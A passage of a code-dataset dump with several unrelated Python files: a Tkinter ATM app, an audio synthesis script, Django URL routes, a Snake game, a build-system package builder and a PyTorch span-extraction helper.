text=\"Transaction Completed !\", font=ARIAL)\r\n self.label.place(x=200, y=100, width=300, height=100)\r\n self.conn.execute(\"update atm set bal = bal + ? where acc_no = ?\",(self.money_box.get(),self.ac))\r\n self.conn.commit()\r\n\r\n def withdrawl_money(self):\r\n self.money_box = Entry(self.frame,bg=\"honeydew\",highlightcolor=\"#50A8B0\",\r\n highlightthickness=2,\r\n highlightbackground=\"white\")\r\n self.submitButton = Button(self.frame,text=\"Submit\",bg=\"#50A8B0\",fg=\"white\",font=ARIAL)\r\n\r\n self.money_box.place(x=200,y=100,width=200,height=20)\r\n self.submitButton.place(x=445,y=100,width=55,height=20)\r\n self.submitButton.bind(\"<Button-1>\",self.withdrawl_trans)\r\n\r\n def withdrawl_trans(self,flag):\r\n self.label = Label(self.frame, text=\"Money Withdrawl !\", font=ARIAL)\r\n self.label.place(x=200, y=100, width=300, height=100)\r\n self.conn.execute(\"update atm set bal = bal - ? where acc_no = ?\",(self.money_box.get(),self.ac))\r\n self.conn.commit()\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"Sign In\")\r\nroot.geometry(\"600x420\")\r\nicon = PhotoImage(file=\"icon.png\")\r\nroot.tk.call(\"wm\",'iconphoto',root._w,icon)\r\nobj = Bank(root)\r\nroot.mainloop()\r\n\r\n'''If you like this project give a star ,,,,,,Thanks !'''\r\n","repo_name":"rajatbhatia1998/Banking_Project-ATM-","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"37330265820","text":"# import section\nfrom wave_terrain import WaveTerrainSynthesis\nfrom orbits import OrbitTypes, Orbit\nfrom envelopes import EnvelopeTypes, Envelope\nfrom terrain import Terrain\nimport numpy as np\nimport soundfile as sf\n\n# main scripts\nWIDTH, HEIGHT = 512, 512\nDUR = 2\nSR = 44100\nSAMPLE_DUR = int(DUR * SR)\n\nENVELOPE_DUR = 0.1\n\nFREQX = 9000\nFREQY = 125\n\nHAPTIC_FREQ = 3\n\n# main function\ndef main() -> None:\n terrain = Terrain(size=(WIDTH, HEIGHT), xy_incr=(0.01, 0.01))\n \n envelope = Envelope(\n envelope_type=EnvelopeTypes.ADSR, \n dur=ENVELOPE_DUR,\n sr=SR,\n atk=0.001, \n decay=0, \n release=ENVELOPE_DUR - 0.001, \n sustain_amp=1.0, \n initial_amp=0.0001, \n end_amp=0.0001, \n mode=\"exp\"\n )\n \n # envelope.show_env()\n # return \n \n orbit = Orbit(orbit_type=OrbitTypes.SPIRAL, center=(0.5, 0.5))\n orbit.envelope = envelope\n \n # orbit.show_orbit(period=1 / SR)\n \n wt = WaveTerrainSynthesis(sr=SR)\n wt.terrain = terrain\n wt.orbit = orbit\n \n y = np.zeros(SAMPLE_DUR, dtype=np.float64)\n for i in range(SAMPLE_DUR):\n sample = wt.get_sample(freqs=(FREQX, FREQY), haptic_freq=HAPTIC_FREQ, max_r=0.707)\n y[i] = sample\n \n # master envelope\n y *= np.hanning(SAMPLE_DUR)\n \n sf.write(\"wt.wav\", y, SR, \"PCM_16\")\n\n\n# [MAIN PROGRAM]: if the module is being run as the main program, it calls the \"main()\" function\nif __name__ == \"__main__\":\n main()","repo_name":"PasqualeMainolfi/WT","sub_path":"WT/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32642133912","text":"from django.urls import path\nfrom .views import RubricView, newRubricView, DeleteRubricView, RubricCopyView\n\nfrom . import views\n\napp_name = 'rubrics'\nurlpatterns = [\n path('new', newRubricView, name='new'),\n path('<int:rubric_id>', RubricView.as_view(), name='view'),\n path('<int:pk>/delete', DeleteRubricView.as_view(), name='delete'),\n path('<int:rubric_id>/<int:eval_id>/copy', RubricCopyView.as_view(), name='copy')\n]","repo_name":"DCC-CC4401/2019-1-BC-ML-007-T4","sub_path":"src/rubrics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19252578120","text":"from turtle import Screen\n\nfrom scoreboard import Scoreboard\nfrom snake import Snake\nfrom food import Food\nimport time\n\nWIDTH = 600\nHEIGHT = 600\nSNAKE_SPEED = 0.1\nFOOD_SCORE = 10\n\nscreen = Screen()\nscreen.setup(width=WIDTH, height=HEIGHT)\nscreen.bgcolor(\"black\")\nscreen.title(\"Snake\")\nscreen.tracer(0)\n\nplaying = True\nsnake = Snake()\nfood = Food()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkey(snake.up, \"Up\")\nscreen.onkey(snake.down, \"Down\")\nscreen.onkey(snake.left, \"Left\")\nscreen.onkey(snake.right, \"Right\")\n\nwhile playing:\n time.sleep(SNAKE_SPEED)\n snake.move()\n screen.update()\n\n # Detect food collision\n if snake.head.distance(food) <= 15:\n print(\"Om nom nom\")\n food.respawn()\n snake.grow()\n scoreboard.add_score(FOOD_SCORE)\n\n # Detect wall collision\n if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:\n playing = False\n\n # Detect tail collision\n # If head collides with any segment in the tail:\n for segment in snake.segments[1:]:\n if snake.head.distance(segment) < 10: \n playing = False\n\nscoreboard.game_over()\n\nscreen.exitonclick()\n","repo_name":"tysongf/100-days-of-python","sub_path":"projects/20/snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12987570905","text":"from typing import Any\nfrom typing import Callable\nfrom typing import cast\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\nimport os\nimport multiprocessing\nimport shlex\nimport sys\nimport subprocess\nfrom FslBuildGen import IOUtil\nfrom FslBuildGen import PackageUtil\nfrom FslBuildGen import PackageListUtil\nfrom FslBuildGen import PlatformUtil\nfrom FslBuildGen.BasicConfig import BasicConfig\nfrom FslBuildGen.Build.BuildConfigRecord import BuildConfigRecord\nfrom FslBuildGen.Build.BuildUtil import PlatformBuildUtil\nfrom FslBuildGen.Build.DataTypes import CommandType\nfrom FslBuildGen.Build.Filter import PackageFilter\nfrom FslBuildGen.Build.Filter import RequirementFilter\nfrom FslBuildGen.Build.RequirementTree import RequirementTree\nfrom FslBuildGen.Build.RequirementTreeNode import RequirementTreeNode\nfrom FslBuildGen.BuildConfig import Validate\nfrom FslBuildGen.BuildContent import ContentBuilder\nfrom FslBuildGen.BuildContent.SharedValues import CONFIG_FSLBUILDCONTENT_ENABLED\nfrom FslBuildGen.BuildExternal import RecipeBuilder\nfrom FslBuildGen.BuildExternal.BuilderSettings import BuilderSettings\nfrom FslBuildGen.Config import Config\nfrom FslBuildGen.Context.GeneratorContext import GeneratorContext\nfrom FslBuildGen.DataTypes import BuildThreads\nfrom FslBuildGen.DataTypes import BuildVariantConfig\nfrom FslBuildGen.DataTypes import BuildVariantType\nfrom FslBuildGen.DataTypes import PackageCreationYearString\nfrom FslBuildGen.DataTypes import PackageRequirementTypeString\nfrom FslBuildGen.DataTypes import PackageType\nfrom FslBuildGen.DataTypes import VariantType\nfrom FslBuildGen.ExtensionListManager import ExtensionListManager\nfrom FslBuildGen.Generator import PluginConfig\nfrom FslBuildGen.Generator.GeneratorPluginBase2 import GeneratorPluginBase2\nfrom FslBuildGen.Generator.GeneratorVC import GeneratorVCUtil\nfrom FslBuildGen.Generator.Report.ReportVariableFormatter import ReportVariableFormatter\nfrom FslBuildGen.Generator.VariantHelper import VariantHelper\nfrom FslBuildGen.PackageConfig import PlatformNameString\nfrom FslBuildGen.Generator.Report.PackageGeneratorReport import PackageGeneratorReport\nfrom FslBuildGen.Packages.Package import Package\nfrom FslBuildGen.Packages.Package import PackagePlatformVariant\nfrom FslBuildGen.Packages.PackageRequirement import PackageRequirement\nfrom FslBuildGen.PackageFilters import PackageFilters\nfrom FslBuildGen.Log import Log\nfrom FslBuildGen.SharedGeneration import GEN_BUILD_ENV_VARIANT_SETTING\nfrom FslBuildGen.SharedGeneration import ToolAddedVariant\nfrom FslBuildGen.Xml.XmlStuff import XmlGenFileVariantOption\n\n\nclass LocalPlatformBuildContext(object):\n def __init__(self, log: Log, generatorOriginalName: str, buildCommand: int, buildThreads: int) -> None:\n self.Log = log\n self.AdditionalBuildArguments = [] # type: List[str]\n PlatformBuildUtil.AddBuildThreads(log, self.AdditionalBuildArguments, generatorOriginalName, buildThreads)\n if buildCommand == CommandType.Clean:\n self.__HandleCleanBuilds(self.AdditionalBuildArguments, generatorOriginalName)\n\n\n def __HandleCleanBuilds(self, rArgumentList: List[str], generatorOriginalName: str) -> None:\n platformName = generatorOriginalName\n if platformName == PlatformNameString.QNX or platformName == PlatformNameString.YOCTO or platformName == PlatformNameString.UBUNTU:\n rArgumentList += ['clean']\n elif platformName == PlatformNameString.WINDOWS:\n rArgumentList += ['/t:Clean']\n else:\n self.Log.LogPrintWarning(\"The builder ignored --Command: clean\")\n\n\nclass LocalBuildContext(object):\n def __init__(self, config: Config, platformBuildContext: LocalPlatformBuildContext,\n generatorReportDict: Dict[Package, PackageGeneratorReport],\n generatorName: str) -> None:\n self.Config = config\n self.Platform = platformBuildContext\n self.GeneratorReportDict = generatorReportDict\n self.GeneratorName = generatorName\n\n\nBuildMethodType = Callable[[LocalBuildContext, Package, BuildConfigRecord, Dict[str, str], Optional[List[str]]], None]\n\nclass Builder(object):\n # requestedPackages is the packages specifically requested by the user or None for SDK builds.\n def __init__(self, generatorContext: GeneratorContext,\n config: Config,\n topLevelPackage: Package,\n buildConfig: BuildConfigRecord,\n enableContentBuilder: bool,\n forceClaimInstallArea: bool) -> None:\n super(Builder, self).__init__()\n self.Log = config\n\n localPlatformBuildContext = LocalPlatformBuildContext(config, generatorContext.Generator.OriginalName,\n buildConfig.BuildCommand, buildConfig.BuildThreads)\n\n\n # Do a final filter that removes all unsupported packages\n resolvedBuildOrder = topLevelPackage.ResolvedBuildOrder\n resolvedBuildOrder = PackageFilter.FilterNotSupported(self.Log, topLevelPackage, resolvedBuildOrder)\n if not PackageFilter.WasThisAExecutableBuildAndAreThereAnyLeft(topLevelPackage.ResolvedBuildOrder, resolvedBuildOrder):\n self.Log.DoPrint(\"No executables left, skipping all\")\n return\n\n # Run the recipe builder on the packages we have left\n # We run the recipe builder on the resolvedBuildOrder since it all required packages, not just the ones we need to build as libs and executables\n builderSettings = BuilderSettings()\n builderSettings.ForceClaimInstallArea = forceClaimInstallArea\n builderSettings.BuildThreads = buildConfig.BuildThreads\n RecipeBuilder.BuildPackagesInOrder(config, generatorContext, resolvedBuildOrder, builderSettings)\n\n\n resolvedBuildOrderBuildable = PackageFilter.FilterBuildablePackages(resolvedBuildOrder)\n if len(resolvedBuildOrderBuildable) == 0:\n config.DoPrint(\"Nothing to build!\")\n return\n\n generatorReportDict = generatorContext.Generator.GenerateReport(self.Log, resolvedBuildOrderBuildable)\n\n packageCount = len(resolvedBuildOrderBuildable)\n\n resolvedBuildOrderBuildable = self.__ApplyPlatformOrderChanges(resolvedBuildOrderBuildable, buildConfig.PlatformName)\n\n originalBuildArgs = buildConfig.BuildArgs\n\n # Default content building for all platform (for those generators that don't add it to the build file)\n if enableContentBuilder:\n for package in resolvedBuildOrderBuildable:\n if package.Type == PackageType.Executable:\n featureList = [entry.Name for entry in package.ResolvedAllUsedFeatures]\n if package.AbsolutePath is None:\n raise Exception(\"Invalid package\")\n ContentBuilder.Build(config, package.AbsolutePath, featureList)\n\n # Windows runs its validation checks slightly differently\n runValidationChecks = (buildConfig.PlatformName != PlatformNameString.WINDOWS)\n\n buildContext = LocalBuildContext(config, localPlatformBuildContext, generatorReportDict, generatorContext.GeneratorName)\n for package in resolvedBuildOrderBuildable:\n config.LogPrint(\"Building package: {0}\".format(package.Name))\n config.LogPrint(\"Package location: {0}\".format(package.AbsolutePath))\n if not config.IsDryRun:\n buildEnv = os.environ.copy() # type: Dict[str, str]\n buildEnv[CONFIG_FSLBUILDCONTENT_ENABLED] = \"false\"\n self.__ExtendEnvironmentDictWithVariants(config, buildEnv, package, buildConfig.VariantSettingsDict)\n buildConfig.BuildArgs = list(originalBuildArgs)\n if config.Verbosity > 4:\n config.DoPrint(\"Package build arguments1: {0}\".format(buildConfig.BuildArgs))\n config.DoPrint(\"General build arguments2: {0}\".format(originalBuildArgs))\n strRunCommands = buildConfig.RunCommand\n runCommands = None # type: Optional[List[str]]\n if strRunCommands is not None:\n userRunCommands = shlex.split(strRunCommands)\n runCommands = self.__TryGenerateRunCommandForExecutable(buildContext, package, buildConfig.VariantSettingsDict, userRunCommands)\n if runValidationChecks:\n featureList = [entry.Name for entry in package.ResolvedAllUsedFeatures]\n Validate.ValidatePlatform(config, buildConfig.PlatformName, featureList, 4)\n self.__BuildPackage(buildContext, package, buildConfig, buildEnv, runCommands)\n\n if packageCount > 0:\n config.LogPrint(\"Build {0} packages\".format(packageCount))\n else:\n config.DoPrint(\"Nothing build!\")\n\n\n def __ApplyPlatformOrderChanges(self, resolvedBuildOrder: List[Package], platformName: str) -> List[Package]:\n if platformName != PlatformNameString.WINDOWS:\n return resolvedBuildOrder\n\n # Since visual studio does its own dependency management and building\n # we dont need to request packages to be build multiple times.\n markedForBuild = set() # type: Set[str]\n result = [] # type: List[Package]\n for package in reversed(resolvedBuildOrder):\n if not package.Name in markedForBuild:\n markedForBuild.add(package.Name)\n result.append(package)\n for entry in package.ResolvedAllDependencies:\n markedForBuild.add(entry.Name)\n\n return result\n\n\n def __BuildPackage(self, buildContext: LocalBuildContext,\n package: Package,\n buildConfig: BuildConfigRecord,\n buildEnv: Dict[str, str],\n runCommands: Optional[List[str]]) -> None:\n if package.AbsolutePath is None or package.ResolvedBuildPath is None:\n raise Exception(\"Invalid package\")\n if buildContext.GeneratorReportDict is None:\n raise Exception(\"Build not supported by generator '{0}' for package: {1}\".format(buildContext.GeneratorName, package.Name))\n if package not in buildContext.GeneratorReportDict:\n raise Exception(\"Build not supported by generator '{0}' for package: {1}\".format(buildContext.GeneratorName, package.Name))\n generatorReport = buildContext.GeneratorReportDict[package]\n buildReport = generatorReport.BuildReport\n variableReport = generatorReport.VariableReport\n if buildReport is None:\n raise Exception(\"Build report not supported by generator '{0}' for package: {1}\".format(buildContext.GeneratorName, package.Name))\n buildCommandReport = buildReport.BuildCommandReport\n if buildCommandReport is None:\n if self.Log.Verbosity >= 5:\n self.Log.LogPrint(\"Skipping package '{0}' as its build command was None\".format(package.Name))\n return\n\n currentWorkingDirectory = package.AbsolutePath\n if buildCommandReport.CurrentWorkingDirectoryFormatString is not None:\n currentWorkingDirectory = ReportVariableFormatter.Format(buildCommandReport.CurrentWorkingDirectoryFormatString, variableReport, buildConfig.VariantSettingsDict)\n\n buildCommandStr = ReportVariableFormatter.Format(buildCommandReport.CommandFormatString, variableReport, buildConfig.VariantSettingsDict)\n if not buildCommandReport.UseAsRelative:\n buildCommandStr = IOUtil.Join(currentWorkingDirectory, buildCommandStr)\n\n buildArgumentList = []\n for buildArgument in buildCommandReport.Arguments:\n buildArgument = ReportVariableFormatter.Format(buildArgument, variableReport, buildConfig.VariantSettingsDict)\n buildArgumentList.append(buildArgument)\n\n\n buildCommand = [buildCommandStr] + buildArgumentList + buildConfig.BuildArgs\n if len(buildContext.Platform.AdditionalBuildArguments) > 0:\n buildCommand += buildContext.Platform.AdditionalBuildArguments\n\n try:\n result = subprocess.call(buildCommand, cwd=currentWorkingDirectory, env=buildEnv)\n if result != 0:\n self.Log.LogPrintWarning(\"The build command '{0}' failed with '{1}'. It was run with CWD: '{2}'\".format(\" \".join(buildCommand), result, currentWorkingDirectory))\n sys.exit(result)\n except FileNotFoundError:\n self.Log.DoPrintWarning(\"The build command '{0}' failed with 'file not found'. It was run with CWD: '{1}'\".format(\" \".join(buildCommand), currentWorkingDirectory))\n raise\n\n if runCommands:\n try:\n # TODO: Allow the working directory for the run command to be changed too. For now use the original choice of absolute path for the package\n currentWorkingDirectory = package.AbsolutePath\n result = subprocess.call(runCommands, cwd=currentWorkingDirectory, env=buildEnv)\n if result != 0:\n self.Log.LogPrintWarning(\"The run command '{0}' failed with '{1}'. It was run with CWD: '{2}'\".format(\" \".join(runCommands), result, currentWorkingDirectory))\n sys.exit(result)\n except FileNotFoundError:\n self.Log.LogPrintWarning(\"The run command '{0}' failed with 'file not found'. It was run with CWD: '{1}'\".format(\" \".join(runCommands), currentWorkingDirectory))\n raise\n\n\n\n def __TryLocateVariant(self, package: Package, key: str) -> Optional[PackagePlatformVariant]:\n if key in package.ResolvedAllVariantDict:\n return package.ResolvedAllVariantDict[key]\n # try a manual search for 'virtual keys'\n for entry in list(package.ResolvedAllVariantDict.values()):\n if key in entry.PurifiedName:\n return entry\n return None\n\n\n def __ExtendEnvironmentDictWithVariants(self, config: Config,\n buildEnv: Dict[str, str],\n package: Package,\n userVariantSettingDict: Dict[str, str]) -> None:\n for key, value in list(userVariantSettingDict.items()):\n variant = self.__TryLocateVariant(package, key)\n if variant is not None:\n if variant.Type == VariantType.Virtual or (value in variant.OptionDict):\n envName = \"{0}{1}\".format(GEN_BUILD_ENV_VARIANT_SETTING, key.upper())\n if envName in buildEnv:\n raise Exception(\"The environment variable {0} has allready been defined\".format(envName))\n buildEnv[envName] = value\n else:\n validValues = list(variant.OptionDict.keys())\n validValues.sort()\n config.LogPrint(\"WARNING: Variant '%s' expects one of the following values: '%s' not '%s'\" % (key, ','.join(validValues), value))\n\n\n\n def __ExtractRelevantVariantSettingsDict(self, config: Config,\n package: Package,\n userVariantSettingDict: Dict[str, str]) -> Dict[str, str]:\n \"\"\" Filters the userVariantSettingsDict down into a dict containing only the entries that are relevant for this package.\n It also validates that the user-value is valid for the given variant.\n \"\"\"\n dictVariantSettings = {} # type: Dict[str, str]\n for key, value in userVariantSettingDict.items():\n if key in package.ResolvedAllVariantDict:\n variant = package.ResolvedAllVariantDict[key]\n if value in variant.OptionDict:\n dictVariantSettings[key] = value\n else:\n validValues = list(variant.OptionDict.keys())\n validValues.sort()\n config.DoPrintWarning(\"Variant '{0}' expects one of the following values: '{1}' not '{2}'\".format(key, ','.join(validValues), value))\n return dictVariantSettings\n\n\n\n\n\n def __TryGenerateRunCommandForExecutable(self, buildContext: LocalBuildContext,\n package: Package,\n userVariantSettingDict: Dict[str, str],\n runCommands: Optional[List[str]]) -> Optional[List[str]]:\n if package.Type != PackageType.Executable or runCommands is None or len(runCommands) <= 0:\n return None\n if package.ResolvedBuildPath is None or package.AbsolutePath is None:\n raise Exception(\"Invalid package\")\n\n if package not in buildContext.GeneratorReportDict:\n raise Exception(\"ForAllExe not supported by generator for package: {0}\".format(package.Name))\n\n generatorReport = buildContext.GeneratorReportDict[package]\n variableReport = generatorReport.VariableReport\n executableReport = generatorReport.ExecutableReport\n if executableReport is None:\n raise Exception(\"ForAllExe not supported by generator for package {0} as it didnt contain a executable record\".format(package.Name))\n\n foundVariantExePath = ReportVariableFormatter.Format(executableReport.ExeFormatString,\n variableReport, userVariantSettingDict,\n executableReport.EnvironmentVariableResolveMethod)\n packagePath = package.AbsolutePath\n fullPathExe = IOUtil.Join(packagePath, foundVariantExePath)\n exeName = IOUtil.GetFileName(foundVariantExePath)\n exePath = IOUtil.GetDirectoryName(fullPathExe)\n contentPath = IOUtil.Join(packagePath, \"Content\")\n fullBuildDirPath = IOUtil.Join(packagePath, package.ResolvedBuildPath)\n fullBuildDirPath = buildContext.Config.ToCurrentOSPathDirectConversion(fullBuildDirPath)\n fullPathExe = buildContext.Config.ToCurrentOSPathDirectConversion(fullPathExe)\n exeName = buildContext.Config.ToCurrentOSPathDirectConversion(exeName)\n exePath = buildContext.Config.ToCurrentOSPathDirectConversion(exePath)\n packagePath = buildContext.Config.ToCurrentOSPathDirectConversion(packagePath)\n contentPath = buildContext.Config.ToCurrentOSPathDirectConversion(contentPath)\n\n commands = []\n if executableReport.RunScript is not None:\n runScript = executableReport.RunScript\n if not executableReport.UseAsRelative:\n runScript = IOUtil.Join(packagePath, runScript)\n\n commands.append(runScript)\n\n for commandToRun in runCommands:\n command = commandToRun\n command = command.replace(\"(EXE)\", fullPathExe)\n command = command.replace(\"(EXE_NAME)\", exeName)\n command = command.replace(\"(EXE_PATH)\", exePath)\n command = command.replace(\"(PACKAGE_NAME)\", package.Name)\n command = command.replace(\"(PACKAGE_PATH)\", packagePath)\n command = command.replace(\"(CONTENT_PATH)\", contentPath)\n command = command.replace(\"(BUILD_PATH)\", fullBuildDirPath)\n commands.append(command)\n return commands\n\n\n\ndef __BuildCompleteVariantDict(topLevelPackage: Package) -> Dict[str, PackagePlatformVariant]:\n variantDict = dict(topLevelPackage.ResolvedAllVariantDict) # type: Dict[str, PackagePlatformVariant]\n return variantDict\n\n\ndef __ValidateUserVariantSettings(config: Config,\n topLevelPackage: Package,\n userVariantSettingDict: Dict[str, str]) -> None:\n variantDict = __BuildCompleteVariantDict(topLevelPackage)\n for key, value in list(userVariantSettingDict.items()):\n if key in variantDict:\n variant = variantDict[key]\n if not value in variant.OptionDict:\n validValues = list(variant.OptionDict.keys())\n validValues.sort()\n raise Exception(\"Variant '{0}' expects one of the following values: '{1}' not '{2}'\".format(key, ','.join(validValues), value))\n elif key != ToolAddedVariant.CONFIG:\n config.LogPrint(\"WARNING: Unused variant setting '{0}'\".format(key))\n\n\ndef __LogVariantSettings(config: Config, variantSettingsDict: Dict[str, str]) -> None:\n if len(variantSettingsDict) <= 0:\n return\n names = list(variantSettingsDict.keys())\n names.sort()\n result = []\n for name in names:\n result.append(\"{0}={1}\".format(name, variantSettingsDict[name]))\n config.LogPrint(\"Variant settings: {0}\".format(\", \".join(result)))\n\n\n# generator = the generator that was used to build the files\ndef BuildPackages(generatorContext: GeneratorContext,\n config: Config,\n packages: List[Package],\n variantSettingsDict: Dict[str, str],\n buildArgs: List[str],\n buildForAllExe: Optional[str],\n generator: GeneratorPluginBase2,\n enableContentBuilder: bool,\n forceClaimInstallArea: bool,\n buildThreads: int,\n buildCommand: int) -> None:\n PlatformUtil.CheckBuildPlatform(generatorContext.PlatformName)\n topLevelPackage = PackageListUtil.GetTopLevelPackage(packages)\n\n __ValidateUserVariantSettings(config, topLevelPackage, variantSettingsDict)\n __LogVariantSettings(config, variantSettingsDict)\n\n buildConfig = BuildConfigRecord(generatorContext.PlatformName, variantSettingsDict, buildCommand, buildArgs, buildForAllExe, generator, buildThreads)\n Builder(generatorContext, config, topLevelPackage, buildConfig, enableContentBuilder, forceClaimInstallArea)\n\n\n# requestedFiles is None for SDK builds else its the list of specifically requested files by the user\ndef ShowVariantList(log: Log,\n topLevelPackage: Package,\n requestedFiles: Optional[List[str]],\n generator: GeneratorPluginBase2) -> None:\n\n variantDict = __BuildCompleteVariantDict(topLevelPackage)\n\n\n # This is kind of a hack to list this here (its also not a real variant inside our model)\n generatorVariants = generator.GetVariants()\n if len(variantDict) <= 0 and len(generatorVariants) <= 0:\n log.DoPrint(\"Variants: None\")\n return\n\n # Pretty print useful information\n log.DoPrint(\"Variants:\")\n\n generatorVariants.sort(key=lambda s: s.Name.lower())\n for variantInfo in generatorVariants:\n if variantInfo.Type == BuildVariantType.Static:\n log.DoPrint(\" {0}={1} (Introduced by native build system generator)\".format(variantInfo.Name, variantInfo.Description))\n else:\n log.DoPrint(\" {0}={1} (Introduced by native build system)\".format(variantInfo.Name, variantInfo.Description))\n\n variantNames = list(variantDict.keys())\n variantNames.sort()\n for variantName in variantNames:\n variant = variantDict[variantName]\n optionNames = list(variant.OptionDict.keys())\n optionNames.sort()\n if variant.Type == VariantType.Virtual:\n log.DoPrint(\" {0}={1} *Virtual* (Introduced by package: {2})\".format(variant.PurifiedName, ', '.join(optionNames), variant.IntroducedByPackageName))\n else:\n log.DoPrint((\" {0}={1} (Introduced by package: {2})\".format(variant.PurifiedName, ', '.join(optionNames), variant.IntroducedByPackageName)))\n\n\ndef ShowBuildVariantList(log: Log, generator: GeneratorPluginBase2) -> None:\n # This is kind of a hack to list this here (its also not a real variant inside our model)\n generatorVariants = [variant for variant in generator.GetVariants() if variant.Type == BuildVariantType.Static]\n\n if len(generatorVariants) <= 0:\n log.DoPrint(\"Build variants: None\")\n return\n log.DoPrint(\"Build variants:\")\n\n generatorVariants.sort(key=lambda s: s.Name.lower())\n\n for variantInfo in generatorVariants:\n log.DoPrint(\" {0}={1} (Introduced by native build system generator)\".format(variantInfo.Name, variantInfo.Description))\n\n\ndef __PrintRequirementsNode(log: Log,\n node: RequirementTreeNode,\n currentIndent: str,\n strAddIndent: str) -> None:\n if node.Content is None:\n raise Exception(\"Invalid node\")\n strFormat = \"{0}-\"\n if node.Content.Type == PackageRequirementTypeString.Feature:\n strFormat += \" '{2}'\"\n else:\n strFormat += \" {1}: '{2}'\"\n if len(node.Content.Version) > 0:\n strFormat += \" V{3}\"\n #if len(node.Content.Extends) > 0:\n # strFormat += \" extends '{4}'\"\n strFormat += \" (introduced by package: {5})\"\n log.DoPrint(strFormat.format(currentIndent, node.Content.Type, node.Content.Name, node.Content.Version, node.Content.Extends, \", \".join(node.Content.IntroducedByPackages)))\n\n # Group by type\n dictGroup = {} # type: Dict[str, List[RequirementTreeNode]]\n for childNode in node.Children:\n if childNode.Content is None:\n raise Exception(\"Invalid node\")\n if childNode.Content.Type in dictGroup:\n dictGroup[childNode.Content.Type].append(childNode)\n else:\n dictGroup[childNode.Content.Type] = [childNode]\n\n # Pretty print useful information in name sorted order\n sortedGroupIds = list(dictGroup.keys())\n # sort by type name, but make sure that new 'features' go last\n sortedGroupIds.sort(key=lambda s: s if s != PackageRequirementTypeString.Feature else '{{feature}}')\n\n for groupId in sortedGroupIds:\n groupedRequirements = dictGroup[groupId]\n groupedRequirements.sort(key=lambda s: None if s.Content is None else s.Content.Id)\n for childNode in groupedRequirements:\n __PrintRequirementsNode(log, childNode, currentIndent + strAddIndent, strAddIndent)\n\n\n# requestedFiles is None for SDK builds else its the list of specifically requested files by the user\ndef ShowRequirementList(log: Log,\n basicConfig: BasicConfig,\n topLevelPackage: Package,\n requestedFiles: Optional[List[str]],\n showFeaturesOnly: bool = False) -> None:\n message = \"Requirements\" if not showFeaturesOnly else \"Features\"\n filterName = None if not showFeaturesOnly else PackageRequirementTypeString.Feature\n requestedPackages = PackageUtil.GetPackageListFromFilenames(topLevelPackage, requestedFiles)\n requirements = RequirementFilter.GetRequirementList(topLevelPackage, requestedPackages, filterName)\n\n if len(requirements) <= 0:\n log.DoPrint(\"{0}: None\".format(message))\n return\n log.DoPrint(\"{0}:\".format(message))\n\n rootNode = RequirementTree(requirements).RootNode\n\n strAddIndent = \" \"\n # We only show the type group info when there is more than one\n #showTypeGroup = len(rootNode.Children) > 1\n baseIndent = \"\" #strAddIndent if len(rootNode.Children) > 1 else \"\"\n\n sortedFeatures = list(rootNode.Children)\n sortedFeatures.sort(key=lambda s: None if s.Content is None else s.Content.Id)\n for sortedFeature in sortedFeatures:\n __PrintRequirementsNode(log, sortedFeature, baseIndent, strAddIndent)\n\n\n# requestedFiles is None for SDK builds else its the list of specifically requested files by the user\ndef ShowFeatureList(log: Log,\n basicConfig: Config,\n topLevelPackage: Package,\n requestedFiles: Optional[List[str]]) -> None:\n ShowRequirementList(log, basicConfig, topLevelPackage, requestedFiles, True)\n\n\n# requestedFiles is None for SDK builds else its the list of specifically requested files by the user\ndef ShowExtensionList(log: Log,\n topLevelPackage: Package,\n requestedFiles: Optional[List[str]]) -> None:\n requestedPackages = PackageUtil.GetPackageListFromFilenames(topLevelPackage, requestedFiles)\n requirements = RequirementFilter.GetRequirementList(topLevelPackage, requestedPackages, PackageRequirementTypeString.Extension)\n\n if len(requirements) <= 0:\n log.DoPrint(\"Extensions: None\")\n return\n log.DoPrint(\"Extensions:\")\n\n # Pretty print useful information in name sorted order\n requirements.sort(key=lambda s: s.Id)\n\n currentIndent = \" \"\n\n for requirement in requirements:\n strFormat = \"{0}- '{1}'\"\n if len(requirement.Version) > 0:\n strFormat += \" V{2}\"\n if len(requirement.Extends) > 0:\n strFormat += \" extends '{3}'\"\n strFormat += \" (introduced by package: {4})\"\n log.DoPrint(strFormat.format(currentIndent, requirement.Name, requirement.Version, requirement.Extends, \", \".join(requirement.IntroducedByPackages)))\n","repo_name":"alejandrolozano2/OpenGL_DemoFramework","sub_path":".Config/FslBuildGen/Build/Builder.py","file_name":"Builder.py","file_ext":"py","file_size_in_byte":28986,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36149770084","text":"# coding=utf-8\nfrom typing import List, Iterator\nimport torch\nfrom torchdata.datapipes import functional_datapipe\nfrom torchdata.datapipes.iter import IterDataPipe\n\n\ndef get_ids_greater_than(probs: torch.Tensor, threshold: float = 0.5) -> List[torch.Tensor]:\n \"\"\"\n Get idx of the last dimension in probability arrays, which is greater than the threshold\n \"\"\"\n if probs.dim() < 2:\n probs = probs.unsqueeze(0)\n probs_bool = probs.gt(threshold)\n ids_row, ids_col = torch.nonzero(probs_bool, as_tuple=True)\n \n result = []\n shape = probs.size()\n for i in range(shape[0]):\n result.append(torch.masked_select(ids_col, ids_row == i))\n \n return result\n\ndef get_span(start_ids, end_ids):\n \"\"\"\n copy from paddlenlp\n Get span set from position start and end list.\n \"\"\"\n start_pointer = 0\n end_pointer = 0\n len_start = len(start_ids)\n len_end = len(end_ids)\n couple_dict = {}\n while start_pointer < len_start and end_pointer < len_end:\n start_id = start_ids[start_pointer]\n end_id = end_ids[end_pointer]\n\n if start_id == end_id:\n couple_dict[end_ids[end_pointer]] = 